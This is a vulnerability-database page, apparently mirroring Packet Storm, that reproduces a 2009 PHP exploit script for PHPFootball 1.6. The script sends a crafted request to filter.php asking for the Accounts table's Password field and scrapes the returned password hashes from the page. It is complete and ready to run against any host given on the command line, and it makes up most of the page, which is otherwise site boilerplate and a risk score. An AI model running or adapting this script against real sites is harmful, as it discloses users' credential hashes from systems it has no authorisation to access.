Lucene search

PHPFootball 1.6 Hash Disclosure

🗓️ 02 Jan 2009 00:00:00Reported by KinG-LioNType

packetstorm🔗 packetstormsecurity.com👁 16 Views

PHPFootball 1.6 Hash Disclosure from filter.php Remote Hos

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`<?php  
  
// http://garr.dl.sourceforge.net/sourceforge/phpfootball/PHPfootball1.6.zip  
  
$host = $argv[1];  
$path = $argv[2];  
  
if ($argc != 3) {  
  
echo "PHPFootball <= 1.6 (filter.php) Remote Hash Disclosure Exploit\n";  
echo "by KinG-LioN - http://eurohackers.it\n";  
echo "Usage: php {$argv[0]} <host> <path>\n";  
exit;  
}  
else {  
  
$head .= "GET /{$path}/filter.php?dbtable=Accounts&dbfield=Password HTTP/1.1\r\n";  
$head .= "Host: {$host}\r\n";  
$head .= "Connection: close\r\n\r\n";  
  
$fsock = fsockopen ($host,80);  
fputs ($fsock,$head);  
  
while (!feof($fsock)) {  
$cont .= fgets($fsock);  
}   
fclose($fsock);   
  
if (preg_match_all("/<td class=td>(.+?)<\/td>/",$cont,$i)) {  
print_r($i[1]);  
}   
else {  
die ("exploit error\n");  
}  
}  
  
  
?>  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

02 Jan 2009 00:00Current

7.4High risk

Vulners AI Score7.4